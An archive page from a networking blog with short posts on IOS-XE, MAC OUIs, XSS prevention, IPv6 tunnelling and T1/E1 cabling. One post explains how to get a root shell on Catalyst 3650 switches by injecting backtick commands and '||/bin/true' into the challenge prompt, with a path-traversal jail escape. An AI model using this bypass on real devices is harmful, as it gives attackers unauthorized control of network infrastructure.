Showing posts with label CCENT. Show all posts
Showing posts with label CCENT. Show all posts

Friday, December 28, 2018

Professions are here for a reason


Thanks to Ivan Pepelnjak for the below one.
And many others as welll!

An unused knob is sometimes better than a used.
Professions are here for a reason – they enable people to do the work they’re qualified to do.
Needless to say, it took him decades to fully understand its implications.
Do what you’re qualified to do. Don’t think you’re good as me at everything just because you can Google-and-paste. Figure out where your limitations are.
Seek help when you’re dealing with something beyond your comfort zone. The amount of ignorant improvisation we see in IT is stupefying. Have you ever wondered why lawyers and doctors ask for second opinion?
Yes, I know your manager expects you to know everything just because you have administrator or engineer in your job title, which just proves he never thought about the next two paragraphs.
Don’t think you understand other people’s job. I’m always amazed to watch people completely unqualified to have an opinion on a problem loudly offering it just because they’re experts in totally unrelated field. PhDs in chemistry telling IT engineers how to do their jobs would be one of my first-hand experiences.
Don’t think you could do their jobs better than they do… until you tried and proved you can succeed while facing the same constraints they have. My favorite one: an airline pilot confident he could write a program to do airline’s crew scheduling (which is probably an NP-hard problem) on Commodore-64.
Having said all that, do your job well if you want to earn and retain the trust of your peers. If you’re obviously clueless or randomly throwing fixes at the problem trying to figure out which one might stick don’t be surprised when everyone else starts acting in ways I described above.
Accept help (courtesy of Chris Young).  When a grey-beard gives you a piece of advice - LISTEN. Doesn’t mean you have to accept it as truth or obey their commands, but watching people new to the profession make the same mistakes we all made 20 years ago because they didn’t heed the warning is frustrating…
And “I told you so” doesn’t fix the network or the harm that major network outages cause to our reputation as a profession.
at No comments:
Štítky: , , , , , ,

Friday, November 30, 2018

Cisco IOS-XE - Request Platform System Shell

Verifying Authenticity for Digitally Signed Images


Older 3560 & 3580 switches vulnerability:
[code]
Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
[/code]

Workaround:
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
[/code]

No input validation ==>  just use the ' '
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`reboot`
SecureShell: SecureShell [debug]Key verification failed
Switch#
  
Unmounting ng3k filesystems...
Unmounted /dev/sda3...
Warning! - some ng3k filesystems may not have unmounted cleanly...
Please stand by while rebooting the system...
Restarting system.
  
Booting...Initializing RAM +++++++@@@@@@@@...++++++++
[/code]

Netcat found ...
[code]
bash-3.2# find / -name nc
/tmp/sw/mount/cat3k_caa-infra.SPA.03.03.03SE.pkg/usr/binos/bin/nc
/usr/binos/bin/nc
[/code]

What can be done with it? Whatever reality you want, you might create...
[code]

[EXTRA]    Building a toolchain for:                 
[EXTRA]      build  = x86_64-unknown-linux-gnu
[EXTRA]      host   = x86_64-unknown-linux-gnu
[EXTRA]      target = mips-unknown-elf           

bash-3.2# file /mnt/usb0/ninvaders
/mnt/usb0/ninvaders: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.18, with unknown capability
0x41000000 = 0xf676e75, stripped

[/code]

When you request shell following thing happens:

a) shell_wrapper calls system('code_sign_verify_nova_pkg SecureShell challenge response') (same binary is used to verify the images)
b) code_sign_verify_nova_pkg reads via libcodesign_pd.so+libflash.so 2k from /dev/mtdblock6, signs challenge, compares to response and return 0 if it is valid, other wise
c) so anything like ||/bin/true will work just fine

shell_wrapper ignores verification if DISABLE_SHELL_AUTHENTICATION=1 in environment

mtdblock6 RSA public key can be changed, so you can generate valid response by having its secret companion
[code]
you can escape IOS filesystem jail (/mnt/sd3/user) with ../../ sop copy foo ../../etc would copy foo to /etc
[/code]

at No comments:
Štítky: , , , , , , , ,

Wednesday, October 17, 2018

Cisco MACs (OUI) addresses - all of them

00:00:0C        Cisco                  # CISCO SYSTEMS, INC.
00:01:42        Cisco                  # CISCO SYSTEMS, INC.
00:01:43        Cisco                  # CISCO SYSTEMS, INC.
00:01:63        Cisco                  # CISCO SYSTEMS, INC.
00:01:64        Cisco                  # CISCO SYSTEMS, INC.
00:01:96        Cisco                  # CISCO SYSTEMS, INC.
00:01:97        Cisco                  # CISCO SYSTEMS, INC.
00:01:C7        Cisco                  # CISCO SYSTEMS, INC.
00:01:C9        Cisco                  # CISCO SYSTEMS, INC.
00:02:16        Cisco                  # CISCO SYSTEMS, INC.
00:02:17        Cisco                  # CISCO SYSTEMS, INC.
00:02:3D        Cisco                  # Cisco Systems, Inc.
00:02:4A        Cisco                  # CISCO SYSTEMS, INC.

Read more »
at No comments:
Štítky: , , , , , , , , , , , , , ,

Sunday, September 30, 2018

Steps to prevent leverage of cross-site scripting attacks

Cross-site scripting attacks

How-To: Prevent the XSS attack-vector leverage

 Additional steps from Development to Deployment

 **Developers** 

     - Should determine what is a safe user input and reject all others - be it a text, javascript or any unauthorized piece of code
    - Depending on the Input text box, developers can restrict text to certain characters (avoid ones causing troubles) and also limit the maximum number of characters
    - should write a code which checks that improperly formatted data are never inserted directly into the HTML content, that might compromise the whole web application
    - should implement prepared statements (known to be reliable) for any database queries as well as the input validation described above

**Website operators **

    - should carefully choose third-party web app providers to ensure their products have the right security measures in place
    - should test the web apps to ensure that they are not vulnerable to attacks involving cross-site scripting or SQL injections
    - should continuously scan their sites in real-time to detect any unauthorized code. This should involve not only automated website vulnerability scanners (i.e.: Nikto, OVASP)
    - you have to be proactive == > hire an experienced professionals ( White or Grey ) who can assess web app security against attacks like these with a custom approach
 ========================================================================
     The last step is important !
Anything less than a pro-active, comprehensive approach to securing the sites will grow to infringement of a great number of consumer's data privacy due to regulations like GDPR.
     As a good example of a DO's & DON'Ts we might mention the recent attack on "The British Airways". But you can practically choose any of the large attacks during the past 5 years.
 ========================================================================
         
                   ::Remember::

 Just because a website is secure that necessarily doesn't mean that a web application is secure as well
     
 source: TechRepublic 
( https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions )
at No comments:
Štítky: , , , , , , ,

Thursday, July 7, 2016

IPv6 tunnelling


IPv6 Tunnelling
w/Cisco Router 2811


telnet 64.62.142.154

*************************************************************************
*****                      route-server.he.net                      *****
*****              Hurricane Electric IP Route Monitor              *****
*****                           AS 6939                             *****
*************************************************************************

This router maintains peering sessions with some of the core routers in
Hurricane Electric's network. Hurricane Electric operates an international
Internet Backbone and offers transit, colocation, and dedicated servers.

Location                  IPv4                  IPv6
---------------------     ----------------      ------------------------
North America
 Equinix Seattle          216.218.252.176       2001:470:0:3d::1
 Equinix Palo Alto        216.218.252.165       2001:470:0:1b::1
 Equinix San Jose         216.218.252.164       2001:470:0:1a::1
 Hurricane Fremont 1      216.218.252.161       2001:470:0:23::1
 One Wilshire Los Angeles 216.218.252.178       2001:470:0:6c::1
 Equinix Chicago          216.218.252.168       2001:470:0:16::1
 Equinix Dallas           216.218.252.167       2001:470:0:1d::1
 Equinix Toronto          216.218.252.147       2001:470:0:99::1
 Equinix New York         216.218.252.171       2001:470:0:13::1
 Equinix Ashburn          216.218.252.169       2001:470:0:17::1
 NOTA Miami               216.218.252.177       2001:470:0:4a::1
 CoreSite Denver          216.218.252.157       2001:470:0:155::1
 1102 Grand Kansas City   216.218.252.190       2001:470:0:22b::1
 Cologix Montreal         216.218.252.193       2001:470:0:224::1
Europe
 Telecity London          216.218.252.211       2001:470:0:2cc::1
 NIKHEF Amsterdam         216.218.252.173       2001:470:0:e::1
 Interxion Frankfurt      216.218.252.174       2001:470:0:2a::1
 Telehouse Paris          216.218.252.184       2001:470:0:1ae::1
 Equinix Zurich           216.218.252.153       2001:470:0:10c::1
 TeleCity Stockholm       216.218.252.154       2001:470:0:10f::1
 PLIX/LIM Warsaw          216.218.252.189       2001:470:0:215::1
Asia
 Mega-I Hong Kong         216.218.252.180       2001:470:0:c2::1
 Equinix Tokyo            216.218.252.151       2001:470:0:10a::1
 Equinix Singapore        216.218.252.179       2001:470:0:169::1

Configuration of IPv6 Tunnelling

(The IP addresses had been change for security reasons)
#ipv6 unicast-routing
#conf t
!        
interface Tunnel0
 description Hurricane Electric IPv6 Tunnel Broker
 no ip address
 ipv6 address 2001:220:6E:218::2/64
 ipv6 enable
 tunnel source 28.10.16.15
 tunnel mode ipv6ip
 tunnel destination 216.66.86.12
!(The IP addresses had been change for security reasons)


at No comments:
Štítky: , , , ,

Monday, July 4, 2016

E1/T1 RJ45 (RJ48) back-to-back with 2MFT-TE1

E1/T1 RJ45 (RJ48) back-to-back with 2MFT-TE1


Cabling T1/E1 crossover for back-to-back connection

So proposition is to have a Multiflex Trunk card (1 or 2MFT).

Set it up on the router
card type t1 0 2  
or
card type e1 0 2

And connect both cards with T1/E1 crossover cable



Than configure the controller T1 or E1 -- one has to be DCE (clock source internal independent) and the other one DTE (clock source line)
(depends on HWIC slot - mine is in Slot 2)

Router1
controller T1 0/2/0
cablelength long 0db
framing esf
clock source internal independent
linecode b8zs
channel-group 0 timeslots 1-24 speed 64

Router2
controller T1 0/2/0
cablelength long 0db
framing esf
clock source line
linecode b8zs
channel-group 0 timeslots 1-24 speed 64

This will create a logical Serial interfaces on both routers (0/2/0:0).

Configure them an IP address (point-to-point /30 .252 subnet)

Verify with CDP and ping commands.
Running over T1 / E1 now! :)
at No comments:
Štítky: , , , , , , ,
Subscribe to: Posts (Atom)